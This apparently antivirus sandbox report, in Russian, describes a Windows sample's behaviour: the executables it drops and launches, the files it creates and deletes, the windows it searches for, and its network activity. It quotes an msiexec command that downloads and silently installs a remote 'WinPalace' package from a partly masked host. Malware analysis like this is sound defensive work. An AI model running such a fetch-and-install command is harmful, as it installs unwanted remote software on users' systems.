Техническая информация
Вредоносные функции:
Создает и запускает на исполнение:
- '%TEMP%\HZivrn.exe'
Запускает на исполнение:
- '<SYSTEM32>\rundll32.exe' dfdts.dll,DfdGetDefaultPolicyAndSMART
- '<SYSTEM32>\MSIEXEC.EXE' /i "http://cl###.fileslldl.eu/client/pkgs/winpalace/WinPalace20140620063444.msi" DDC_DID=6831135 DDC_RTGURL=http://www.fi##inst.eu/dl/TrackSetup/TrackSetup.aspx?DI######### DDC_UPDATESTATUSURL=http://19#.#.91.3:8080/winpalace/Lobby.WebServices/Installer.asmx CUSTOMNAME02=redirectAsData CUSTOMVALUE02=1 CUSTOMNAME03=remoteIP CUSTOMVALUE03=107 SETUPEXEDIR="<LS_APPDATA>\Temp" SETUPEXENAME="HZivrn.exe"
Изменения в файловой системе:
Создает следующие файлы:
- %TEMP%\~9E33.tmp
- %TEMP%\_is9E34.tmp
- %TEMP%\_is9EE2.tmp
- %WINDIR%\Installer\MSIEC8F.tmp
- %TEMP%\~9EE1.tmp
- %TEMP%\{B4611075-4F9E-453E-81CB-B1C09CBDDC14}\0x0409.ini
- %TEMP%\_is9C9C.tmp
- %TEMP%\HZivrn.exe
- %TEMP%\{B4611075-4F9E-453E-81CB-B1C09CBDDC14}\Setup.INI
- %TEMP%\_is9D48.tmp
- %TEMP%\{B4611075-4F9E-453E-81CB-B1C09CBDDC14}\_ISMSIDEL.INI
Удаляет следующие файлы:
- %TEMP%\_is9EE2.tmp
- %TEMP%\~9EE1.tmp
- %WINDIR%\Installer\MSIEC8F.tmp
- %TEMP%\~9E33.tmp
- %TEMP%\_is9C9C.tmp
- %TEMP%\_is9D48.tmp
- %TEMP%\_is9E34.tmp
Сетевая активность:
Подключается к:
- 'cl###.fileslldl.eu':80
TCP:
Запросы HTTP GET:
- cl###.fileslldl.eu/client/pkgs/winpalace/WinPalace20140620063444.msi
UDP:
- DNS ASK cl###.fileslldl.eu
Другое:
Ищет следующие окна:
- ClassName: 'CicLoaderWndClass' WindowName: '(null)'
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
